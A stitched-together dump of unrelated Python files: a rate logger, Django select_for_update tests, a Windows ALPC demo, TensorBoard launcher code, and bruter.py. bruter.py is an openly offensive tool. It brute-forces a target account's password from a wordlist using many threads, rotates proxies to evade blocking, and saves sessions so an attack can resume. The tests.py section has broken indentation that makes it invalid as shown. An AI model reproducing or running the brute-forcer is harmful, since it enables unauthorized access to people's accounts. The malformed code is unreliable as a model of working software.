        """
        if self.current_rate == 0.0:
            return new_rate
        else:
            return (self.current_rate + new_rate) / 2.0

    def get_avg_rate(self):
        """
        return the average rate since we started measuring
        """
        time_difference = time.time() - self.start_time
        return self.total_records / time_difference if time_difference >= 1e-09 else 0

    def log_message(self):
        # logging may be disabled entirely by passing log_fcn=None
        if not self.log_fcn:
            return
        output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
                 (self.total_records, self.current_rate, self.get_avg_rate())
        self.log_fcn(output, eol='\r')
        if self.log_file:
            with open(self.log_file, "a") as f:
                f.write(output + '\n')

    def get_total_records(self):
        # flush any pending records before reporting the final total
        self.update(time.time())
        self.log_message()
        return self.total_records
|
bruter.py | # Date: 14/02/2020
# Author: SKAR
# Description: Bruter
from time import time, sleep
from lib.browser import Browser
from lib.display import Display
from threading import Thread, RLock
from lib.proxy_manager import ProxyManager
from lib.password_manager import PasswordManager
from lib.const import max_time_to_wait, max_bots_per_proxy
class Bruter(object):
    """
    Coordinates the attack: spawns one Browser attempt per password/proxy pair,
    reaps finished browsers, and persists session progress.
    """

    def __init__(self, username, threads, passlist_path):
        self.browsers = []          # currently running Browser instances
        self.lock = RLock()         # guards browsers/active_passwords/proxy bookkeeping
        self.password = None        # the password that was found, if any
        self.is_alive = True
        self.is_found = False
        self.bots_per_proxy = 0     # browsers spawned on the current proxy
        self.username = username
        self.last_password = None
        self.active_passwords = []  # passwords currently being attempted
        self.proxy_manager = ProxyManager()
        self.display = Display(username, passlist_path)
        self.password_manager = PasswordManager(username,
                                                passlist_path, threads, self.display)

    def manage_session(self):
        """Persist or delete the resume session depending on progress."""
        if self.password_manager.is_read:
            # the whole list was read: delete the session when done or found
            if not self.password_manager.list_size or self.is_found:
                self.password_manager.session.delete()
        else:
            if self.is_found:
                self.password_manager.session.delete()
            else:
                # save progress so the attack can be resumed later
                self.password_manager.session.write(self.password_manager.attempts,
                                                    self.password_manager.passlist)

    def browser_manager(self):
        """Reap finished browsers, record results, and recycle bad proxies."""
        while self.is_alive:
            for browser in self.browsers:
                if not self.is_alive:
                    break

                # `is`/`is not` for None comparisons (previously `==`/`!=`)
                if Display.account_exists is None and Browser.account_exists is not None:
                    Display.account_exists = Browser.account_exists

                if not browser.is_active:
                    password = browser.password
                    if browser.is_attempted and not browser.is_locked:
                        if browser.is_found and not self.is_found:
                            self.password = password
                            self.is_found = True
                        with self.lock:
                            self.password_manager.list_remove(password)
                    else:
                        # the attempt did not complete cleanly: blacklist the proxy
                        with self.lock:
                            self.proxy_manager.bad_proxy(browser.proxy)
                    self.remove_browser(browser)
                else:
                    # close browsers that have been running for too long
                    if browser.start_time:
                        if time() - browser.start_time >= max_time_to_wait:
                            browser.close()

    def remove_browser(self, browser):
        """Drop a browser and its password from the active registries."""
        if browser in self.browsers:
            with self.lock:
                self.browsers.remove(browser)
                self.active_passwords.remove(browser.password)

    def attack(self):
        """Spawn browser attempts for each pending password, rotating proxies."""
        proxy = None
        is_attack_started = False
        while self.is_alive:

            browsers = []
            for password in self.password_manager.passlist:
                if not self.is_alive:
                    break

                if not proxy:
                    proxy = self.proxy_manager.get_proxy()
                    self.bots_per_proxy = 0

                # rotate to a fresh proxy once this one is saturated
                if self.bots_per_proxy >= max_bots_per_proxy:
                    proxy = None

                if not proxy:
                    continue

                if password not in self.active_passwords and password in self.password_manager.passlist:
                    browser = Browser(self.username, password, proxy)
                    browsers.append(browser)
                    self.bots_per_proxy += 1

                    if not is_attack_started:
                        self.display.info('Starting attack ...')
                        is_attack_started = True

                    with self.lock:
                        self.browsers.append(browser)
                        self.active_passwords.append(password)

            for browser in browsers:
                thread = Thread(target=browser.attempt)
                thread.daemon = True
                try:
                    thread.start()
                except Exception:  # was a bare except; don't swallow SystemExit/KeyboardInterrupt
                    self.remove_browser(browser)

    def start_daemon_threads(self):
        """Launch the attack, browser, proxy and password managers as daemons."""
        attack = Thread(target=self.attack)
        browser_manager = Thread(target=self.browser_manager)
        proxy_manager = Thread(target=self.proxy_manager.start)
        password_manager = Thread(target=self.password_manager.start)

        attack.daemon = True
        proxy_manager.daemon = True
        browser_manager.daemon = True
        password_manager.daemon = True

        attack.start()
        proxy_manager.start()
        browser_manager.start()
        password_manager.start()

        self.display.info('Searching for proxies ...')

    def stop_daemon_threads(self):
        self.proxy_manager.stop()
        self.password_manager.stop()

    def start(self):
        """Main loop: display progress until found, stopped, or the list is exhausted."""
        self.display.info('Initiating daemon threads ...')
        self.start_daemon_threads()

        last_attempt = 0
        while self.is_alive and not self.is_found:

            # nothing new happened since the last refresh: back off briefly
            if last_attempt == self.password_manager.attempts and self.password_manager.attempts:
                sleep(1.5)
                continue

            for browser in self.browsers:
                self.display.stats(
                    browser.password, self.password_manager.attempts, len(self.browsers))

                last_attempt = self.password_manager.attempts
                self.last_password = browser.password

                if not self.is_alive or self.is_found:
                    break

            # list exhausted and no browsers left: we are done
            if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers):
                self.is_alive = False

    def stop(self):
        self.is_alive = False
        self.manage_session()
        self.stop_daemon_threads()
        self.password_manager.session.is_busy = False
|
tests.py | import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import City, Country, Person, PersonProfile
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
    # This is executed in autocommit mode so that code in
    # run_select_for_update can see this data.
    self.country1 = Country.objects.create(name='Belgium')
    self.country2 = Country.objects.create(name='France')
    self.city1 = City.objects.create(name='Liberchies', country=self.country1)
    self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
    self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
    self.person_profile = PersonProfile.objects.create(person=self.person)

    # We need another database connection in transaction to test that one
    # connection issuing a SELECT ... FOR UPDATE will block.
    self.new_connection = connection.copy()

def tearDown(self):
    try:
        self.end_blocking_transaction()
    except (DatabaseError, AttributeError):
        # the test may not have opened a blocking transaction (no self.cursor),
        # or it was already ended; either way there is nothing to clean up
        pass
    self.new_connection.close()
def start_blocking_transaction(self):
    """Lock the Person rows on the second connection until end_blocking_transaction()."""
    self.new_connection.set_autocommit(False)
    # Start a blocking transaction. At some point,
    # end_blocking_transaction() should be called.
    self.cursor = self.new_connection.cursor()
    sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
        'db_table': Person._meta.db_table,
        'for_update': self.new_connection.ops.for_update_sql(),
    }
    self.cursor.execute(sql, ())
    self.cursor.fetchone()

def end_blocking_transaction(self):
    # Roll back the blocking transaction.
    self.cursor.close()
    self.new_connection.rollback()
    self.new_connection.set_autocommit(True)

def has_for_update_sql(self, queries, **kwargs):
    # Examine the SQL that was executed to determine whether it
    # contains the 'SELECT..FOR UPDATE' stanza.
    for_update_sql = connection.ops.for_update_sql(**kwargs)
    return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
    """
    The backend's FOR UPDATE OF variant appears in the generated SQL when
    select_for_update() is invoked.
    """
    with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
        # Chained select_for_update() calls override one another -- only the
        # last of=(...) takes effect -- so the previously-present first call
        # with of=('born__country',) was dead code and has been removed.
        list(Person.objects.select_related(
            'born__country',
        ).select_for_update(
            of=('self', 'born__country')
        ))
    features = connections['default'].features
    if features.select_for_update_of_column:
        expected = ['"select_for_update_person"."id"', '"select_for_update_country"."id"']
    else:
        expected = ['"select_for_update_person"', '"select_for_update_country"']
    if features.uppercases_column_names:
        # Oracle-style backends report upper-cased identifiers.
        expected = [value.upper() for value in expected]
    self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
    # values() after select_for_update(of=('self',)) must still execute.
    with transaction.atomic():
        rows = list(Person.objects.select_for_update(of=('self',)).values('pk'))
        self.assertEqual(rows, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
    # values_list() after select_for_update(of=('self',)) must still execute.
    with transaction.atomic():
        rows = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
        self.assertEqual(rows, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
    """
    select_for_update(of=['self']) when the only columns selected are from
    related tables.
    """
    with transaction.atomic():
        queryset = Person.objects.select_related('born').select_for_update(of=('self',))
        rows = list(queryset.values('born__name'))
        self.assertEqual(rows, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
    """
    If nowait is specified, we expect an error to be raised rather
    than blocking.
    """
    self.start_blocking_transaction()
    status = []
    thread = threading.Thread(
        target=self.run_select_for_update,
        args=(status,),
        kwargs={'nowait': True},
    )
    thread.start()
    # Give the worker thread time to hit the locked row and fail with
    # the backend's NOWAIT error.
    time.sleep(1)
    thread.join()
    self.end_blocking_transaction()
    # run_select_for_update() appends the raised exception to `status`.
    self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
    """
    If skip_locked is specified, the locked row is skipped resulting in
    Person.DoesNotExist.
    """
    self.start_blocking_transaction()
    status = []
    thread = threading.Thread(
        target=self.run_select_for_update,
        args=(status,),
        kwargs={'skip_locked': True},
    )
    thread.start()
    # Give the worker thread time to run; SKIP LOCKED filters out the
    # locked row, so .get() raises DoesNotExist instead of blocking.
    time.sleep(1)
    thread.join()
    self.end_blocking_transaction()
    # run_select_for_update() appends the raised exception to `status`.
    self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
    """
    NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
    a database backend that supports FOR UPDATE but not NOWAIT.
    """
    msg = 'NOWAIT is not supported on this database backend.'
    with self.assertRaisesMessage(NotSupportedError, msg), transaction.atomic():
        Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
    """
    NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
    on a database backend that supports FOR UPDATE but not SKIP LOCKED.
    """
    msg = 'SKIP LOCKED is not supported on this database backend.'
    with self.assertRaisesMessage(NotSupportedError, msg), transaction.atomic():
        Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
    """
    NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
    a database backend that supports FOR UPDATE but not OF.
    """
    msg = 'FOR UPDATE OF is not supported on this database backend.'
    with self.assertRaisesMessage(NotSupportedError, msg), transaction.atomic():
        Person.objects.select_for_update(of=('self',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
    """
    FieldError is raised if a non-relation field is specified in of=(...).
    """
    # %s placeholder is filled below with the comma-joined invalid names.
    msg = (
        'Invalid field name(s) given in select_for_update(of=(...)): %s. '
        'Only relational fields followed in the query are allowed. '
        'Choices are: self, born, born__country.'
    )
    # Each tuple mixes nonexistent fields and plain (non-relational)
    # fields; all must be rejected.
    invalid_of = [
        ('nonexistent',),
        ('name',),
        ('born__nonexistent',),
        ('born__name',),
        ('born__nonexistent', 'born__name'),
    ]
    for of in invalid_of:
        with self.subTest(of=of):
            with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
                with transaction.atomic():
                    Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
    """
    FieldError is raised if a relation field that is not followed in the
    query is specified in of=(...).
    """
    msg = (
        'Invalid field name(s) given in select_for_update(of=(...)): %s. '
        'Only relational fields followed in the query are allowed. '
        'Choices are: self, born, profile.'
    )
    # These relations exist on the model but are not select_related()'d
    # in the query below, so they are invalid lock targets.
    for name in ['born__country', 'died', 'died__country']:
        with self.subTest(name=name):
            with self.assertRaisesMessage(FieldError, msg % name):
                with transaction.atomic():
                    Person.objects.select_related(
                        'born', 'profile',
                    ).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
    """
    Reverse OneToOneFields may be included in of=(...) as long as NULLs
    are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
    """
    with transaction.atomic():
        queryset = Person.objects.select_related('profile').exclude(profile=None)
        locked = queryset.select_for_update(of=('profile',)).get()
        self.assertEqual(locked.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
    # Build the dotted path to the current backend's feature attribute so
    # mock.patch can force for_update_after_from=True (SQL Server-style
    # placement of FOR UPDATE before WHERE).
    features_class = connections['default'].features.__class__
    attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
    with mock.patch(attribute_to_patch, return_value=True):
        with transaction.atomic():
            self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
    """
    A TransactionManagementError is raised
    when a select_for_update query is executed outside of a transaction.
    """
    msg = 'select_for_update cannot be used outside of a transaction.'
    with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
        # Force evaluation outside of any atomic() block.
        list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
    """
    No TransactionManagementError is raised
    when select_for_update is invoked outside of a transaction -
    only when the query is executed.
    """
    # Building the queryset is lazy and must not raise.
    queryset = Person.objects.all().select_for_update()
    msg = 'select_for_update cannot be used outside of a transaction.'
    with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
        # Evaluation is what triggers the error.
        list(queryset)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
    # A sliced (LIMIT/OFFSET) FOR UPDATE queryset works on backends
    # that support it.
    other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
    with transaction.atomic():
        locked = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
        self.assertEqual(locked[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
    msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
    with self.assertRaisesMessage(NotSupportedError, msg), transaction.atomic():
        list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
    """
    Utility method that runs a SELECT FOR UPDATE against all
    Person instances. After the select_for_update, it attempts
    to update the name of the only record, save, and commit.
    This function expects to run in a separate thread.

    Args:
        status: shared list; 'started' is appended on entry and any
            caught exception is appended on failure, so the spawning
            test can inspect the outcome.
        **kwargs: forwarded to select_for_update() (nowait, skip_locked, ...).
    """
    status.append('started')
    try:
        # We need to enter transaction management again, as this is done on
        # per-thread basis
        with transaction.atomic():
            person = Person.objects.select_for_update(**kwargs).get()
            person.name = 'Fred'
            person.save()
    except (DatabaseError, Person.DoesNotExist) as e:
        status.append(e)
    finally:
        # This method is run in a separate thread. It uses its own
        # database connection. Close it without waiting for the GC.
        connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
    """
    A thread running a select_for_update that accesses rows being touched
    by a similar operation on another connection blocks correctly.
    """
    # First, let's start the transaction in our thread.
    self.start_blocking_transaction()
    # Now, try it again using the ORM's select_for_update
    # facility. Do this in a separate thread.
    status = []
    thread = threading.Thread(
        target=self.run_select_for_update, args=(status,)
    )
    # The thread should immediately block, but we'll sleep
    # for a bit to make sure.
    thread.start()
    sanity_count = 0
    while len(status) != 1 and sanity_count < 10:
        sanity_count += 1
        time.sleep(1)
    if sanity_count >= 10:
        raise ValueError('Thread did not run and block')
    # Check the person hasn't been updated. Since this isn't
    # using FOR UPDATE, it won't block.
    p = Person.objects.get(pk=self.person.pk)
    self.assertEqual('Reinhardt', p.name)
    # When we end our blocking transaction, our thread should
    # be able to continue.
    self.end_blocking_transaction()
    thread.join(5.0)
    # Check the thread has finished. Assuming it has, we should
    # find that it has updated the person's name.
    # BUG FIX: Thread.isAlive() was deprecated and removed in Python 3.9;
    # is_alive() is the supported spelling on all Python 3 versions.
    self.assertFalse(thread.is_alive())
    # We must commit the transaction to ensure that MySQL gets a fresh read,
    # since by default it runs in REPEATABLE READ mode
    transaction.commit()
    p = Person.objects.get(pk=self.person.pk)
    self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
    """
    Running a raw query which can't obtain a FOR UPDATE lock raises
    the correct exception
    """
    self.start_blocking_transaction()

    def raw(status):
        # Runs in a worker thread; the NOWAIT clause makes the raw query
        # fail immediately instead of waiting for the blocked row.
        try:
            list(
                Person.objects.raw(
                    'SELECT * FROM %s %s' % (
                        Person._meta.db_table,
                        connection.ops.for_update_sql(nowait=True)
                    )
                )
            )
        except DatabaseError as e:
            status.append(e)
        finally:
            # This method is run in a separate thread. It uses its own
            # database connection. Close it without waiting for the GC.
            # Connection cannot be closed on Oracle because cursor is still
            # open.
            if connection.vendor != 'oracle':
                connection.close()

    status = []
    thread = threading.Thread(target=raw, kwargs={'status': status})
    thread.start()
    # Give the worker time to hit the lock and fail.
    time.sleep(1)
    thread.join()
    self.end_blocking_transaction()
    self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
    # A FOR UPDATE queryset must be routed to the write database.
    queryset = Person.objects.select_for_update()
    self.assertEqual(router.db_for_write(Person), queryset.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
    # get() on a FOR UPDATE queryset works inside a transaction.
    with transaction.atomic():
        locked_person = Person.objects.select_for_update().get(name='Reinhardt')
        self.assertEqual(locked_person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
    # The two options are mutually exclusive and rejected eagerly,
    # without touching the database.
    msg = 'The nowait option cannot be used with skip_locked.'
    with self.assertRaisesMessage(ValueError, msg):
        Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
    """
    Subqueries should respect ordering as an ORDER BY clause may be useful
    to specify a row locking order to prevent deadlocks (#27193).
    """
    with transaction.atomic():
        inner = Person.objects.order_by('-id').select_for_update()
        outer = Person.objects.filter(id__in=inner)
        self.assertIn('ORDER BY', str(outer.query))
|
simple_alpc.py | import multiprocessing
import windows.alpc
from windows.generated_def import LPC_CONNECTION_REQUEST, LPC_REQUEST
# Name of the ALPC port: the server creates it, the client connects to it.
PORT_NAME = r"\RPC Control\PythonForWindowsPORT"
def alpc_server():
    """ALPC demo server: create the port, accept one connection and
    answer a single request by echoing modified data back."""
    server = windows.alpc.AlpcServer(PORT_NAME)  # Create the ALPC Port
    print("[SERV] PORT <{0}> CREATED".format(PORT_NAME))
    msg = server.recv()  # Wait for a message
    print("[SERV] Message type = {0:#x}".format(msg.type))
    print("[SERV] Received data: <{0}>".format(msg.data))
    assert msg.type & 0xfff == LPC_CONNECTION_REQUEST  # Check that message is a connection request
    print("[SERV] Connection request")
    server.accept_connection(msg)
    msg = server.recv()  # Wait for a real message
    # BUG FIX: `print ""` is Python 2 statement syntax and a SyntaxError
    # under Python 3; use the function form like the rest of the file.
    print("")
    print("[SERV] Received message: <{0}>".format(msg.data))
    print("[SERV] Message type = {0:#x}".format(msg.type))
    assert msg.type & 0xfff == LPC_REQUEST
    # We can reply by two ways:
    #    - Send the same message with modified data
    #    - Recreate a Message and copy the MessageId
    msg.data = "REQUEST '{0}' DONE".format(msg.data)
    server.send(msg)
def alpc_client():
    """ALPC demo client: connect to the server port and exchange one message."""
    current = windows.current_process
    print("Client pid = {0}".format(current.pid))
    # Creation an 'AlpcClient' with a port name will connect to the port with an empty message
    client = windows.alpc.AlpcClient(PORT_NAME)
    print("[CLIENT] Connected: {0}".format(client))
    # send_receive() posts the message and blocks for the reply; a one-way
    # message could be sent with 'client.send' instead.
    response = client.send_receive("Hello world !")
    print("[CLIENT] Response: <{0}>".format(response.data))
if __name__ == "__main__":
    server_proc = multiprocessing.Process(target=alpc_server)
    server_proc.start()
    # Give the server a moment to create the port before connecting.
    import time
    time.sleep(0.5)
    alpc_client()
    print("BYE")
    server_proc.terminate()
program.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for TensorBoard command line program.
This is a lightweight module for bringing up a TensorBoard HTTP server
or emulating the `tensorboard` shell command.
Those wishing to create custom builds of TensorBoard can use this module
by swapping out `tensorboard.main` with the custom definition that
modifies the set of plugins and static assets.
This module does not depend on first-party plugins or the default web
server assets. Those are defined in `tensorboard.default`.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import ABCMeta
from abc import abstractmethod
import argparse
from collections import defaultdict
import errno
import logging
import os
import socket
import sys
import threading
import inspect
from werkzeug import serving
from tensorboard import version
from tensorboard.backend import application
from tensorboard.backend.event_processing import event_file_inspector as efi
from tensorboard.plugins import base_plugin
from tensorboard.util import util
try:
from absl import flags as absl_flags
from absl.flags import argparse_flags
except ImportError:
# Fall back to argparse with no absl flags integration.
absl_flags = None
argparse_flags = argparse
logger = logging.getLogger(__name__)
def setup_environment():
    """Makes recommended modifications to the environment.

    This function changes global state in the Python process. Calling
    this function is a good idea, but it can't appropriately be called
    from library routines.
    """
    util.setup_logging()
    # The default is HTTP/1.0 for some strange reason. If we don't use
    # HTTP/1.1 then a new TCP socket and Python thread is created for
    # each HTTP request. The tradeoff is we must always specify the
    # Content-Length header, or do chunked encoding for streaming.
    serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
def get_default_assets_zip_provider():
    """Opens stock TensorBoard web assets collection.

    Returns:
      Returns function that returns a newly opened file handle to zip file
      containing static assets for stock TensorBoard, or None if webfiles.zip
      could not be found. The value the callback returns must be closed. The
      paths inside the zip file are considered absolute paths on the web server.
    """
    # sys._getframe(1) is the *caller's* frame: webfiles.zip is looked up
    # next to the calling module's file, not next to this module.
    caller_file = inspect.getfile(sys._getframe(1))
    zip_path = os.path.join(os.path.dirname(caller_file), 'webfiles.zip')
    if not os.path.exists(zip_path):
        logger.warning('webfiles.zip static assets not found: %s', zip_path)
        return None
    return lambda: open(zip_path, 'rb')
class TensorBoard(object):
    """Class for running TensorBoard.

    Fields:
      plugin_loaders: Set from plugins passed to constructor.
      assets_zip_provider: Set by constructor.
      server_class: Set by constructor.
      flags: An argparse.Namespace set by the configure() method.
    """

    def __init__(self,
                 plugins=None,
                 assets_zip_provider=None,
                 server_class=None):
        """Creates new instance.

        Args:
          plugins: A list of TensorBoard plugins to load, as TBLoader instances or
            TBPlugin classes. If not specified, defaults to first-party plugins.
          assets_zip_provider: Delegates to TBContext or uses default if None.
          server_class: An optional subclass of TensorBoardServer to use for serving
            the TensorBoard WSGI app.

        :type plugins: list[Union[base_plugin.TBLoader, Type[base_plugin.TBPlugin]]]
        :type assets_zip_provider: () -> file
        :type server_class: class
        """
        if plugins is None:
            # Imported lazily so this module stays free of first-party
            # plugin dependencies unless defaults are actually requested.
            from tensorboard import default
            plugins = default.get_plugins()
        if assets_zip_provider is None:
            assets_zip_provider = get_default_assets_zip_provider()
        if server_class is None:
            server_class = WerkzeugServer

        def make_loader(plugin):
            # Normalize: accept either a ready-made loader instance or a
            # plugin class, which gets wrapped in a BasicLoader.
            if isinstance(plugin, base_plugin.TBLoader):
                return plugin
            if issubclass(plugin, base_plugin.TBPlugin):
                return base_plugin.BasicLoader(plugin)
            raise ValueError("Not a TBLoader or TBPlugin subclass: %s" % plugin)
        self.plugin_loaders = [make_loader(p) for p in plugins]
        self.assets_zip_provider = assets_zip_provider
        self.server_class = server_class
        self.flags = None

    def configure(self, argv=('',), **kwargs):
        """Configures TensorBoard behavior via flags.

        This method will populate the "flags" property with an argparse.Namespace
        representing flag values parsed from the provided argv list, overridden by
        explicit flags from remaining keyword arguments.

        Args:
          argv: Can be set to CLI args equivalent to sys.argv; the first arg is
            taken to be the name of the path being executed.
          kwargs: Additional arguments will override what was parsed from
            argv. They must be passed as Python data structures, e.g.
            `foo=1` rather than `foo="1"`.

        Returns:
          Either argv[:1] if argv was non-empty, or [''] otherwise, as a mechanism
          for absl.app.run() compatibility.

        Raises:
          ValueError: If flag values are invalid.
        """
        parser = argparse_flags.ArgumentParser(
            prog='tensorboard',
            description=('TensorBoard is a suite of web applications for '
                         'inspecting and understanding your TensorFlow runs '
                         'and graphs. https://github.com/tensorflow/tensorboard '))
        # Each plugin loader contributes its own flags to the parser.
        for loader in self.plugin_loaders:
            loader.define_flags(parser)
        arg0 = argv[0] if argv else ''
        flags = parser.parse_args(argv[1:])  # Strip binary name from argv.
        if absl_flags and arg0:
            # Only expose main module Abseil flags as TensorBoard native flags.
            # This is the same logic Abseil's ArgumentParser uses for determining
            # which Abseil flags to include in the short helpstring.
            for flag in set(absl_flags.FLAGS.get_key_flags_for_module(arg0)):
                if hasattr(flags, flag.name):
                    raise ValueError('Conflicting Abseil flag: %s' % flag.name)
                setattr(flags, flag.name, flag.value)
        # Explicit keyword arguments win over anything parsed from argv.
        for k, v in kwargs.items():
            if not hasattr(flags, k):
                raise ValueError('Unknown TensorBoard flag: %s' % k)
            setattr(flags, k, v)
        for loader in self.plugin_loaders:
            loader.fix_flags(flags)
        self.flags = flags
        return [arg0]

    def main(self, ignored_argv=('',)):
        """Blocking main function for TensorBoard.

        This method is called by `tensorboard.main.run_main`, which is the
        standard entrypoint for the tensorboard command line program. The
        configure() method must be called first.

        Args:
          ignored_argv: Do not pass. Required for Abseil compatibility.

        Returns:
          Process exit code, i.e. 0 if successful or non-zero on failure. In
          practice, an exception will most likely be raised instead of
          returning non-zero.

        :rtype: int
        """
        if self.flags.inspect:
            # --inspect short-circuits serving entirely: just dump event
            # file diagnostics and exit.
            logger.info('Not bringing up TensorBoard, but inspecting event files.')
            event_file = os.path.expanduser(self.flags.event_file)
            efi.inspect(self.flags.logdir, event_file, self.flags.tag)
            return 0
        try:
            server = self._make_server()
            sys.stderr.write('TensorBoard %s at %s (Press CTRL+C to quit)\n' %
                             (version.VERSION, server.get_url()))
            sys.stderr.flush()
            server.serve_forever()
            return 0
        except TensorBoardServerException as e:
            # User-friendly error: log and print the message, no traceback.
            logger.error(e.msg)
            sys.stderr.write('ERROR: %s\n' % e.msg)
            sys.stderr.flush()
            return -1

    def launch(self):
        """Python API for launching TensorBoard.

        This method is the same as main() except it launches TensorBoard in
        a separate permanent thread. The configure() method must be called
        first.

        Returns:
          The URL of the TensorBoard web server.

        :rtype: str
        """
        # Make it easy to run TensorBoard inside other programs, e.g. Colab.
        server = self._make_server()
        thread = threading.Thread(target=server.serve_forever, name='TensorBoard')
        thread.daemon = True
        thread.start()
        return server.get_url()

    def _make_server(self):
        """Constructs the TensorBoard WSGI app and instantiates the server."""
        app = application.standard_tensorboard_wsgi(self.flags,
                                                    self.plugin_loaders,
                                                    self.assets_zip_provider)
        return self.server_class(app, self.flags)
class TensorBoardServer(object):
    """Class for customizing TensorBoard WSGI app serving."""
    # NOTE(review): `__metaclass__` is Python 2 syntax and is silently
    # ignored on Python 3, so abstractmethod is not enforced there --
    # confirm whether Python 2 support is still required before changing.
    __metaclass__ = ABCMeta

    @abstractmethod
    def __init__(self, wsgi_app, flags):
        """Create a flag-configured HTTP server for TensorBoard's WSGI app.

        Args:
          wsgi_app: The TensorBoard WSGI application to create a server for.
          flags: argparse.Namespace instance of TensorBoard flags.
        """
        raise NotImplementedError()

    @abstractmethod
    def serve_forever(self):
        """Blocking call to start serving the TensorBoard server."""
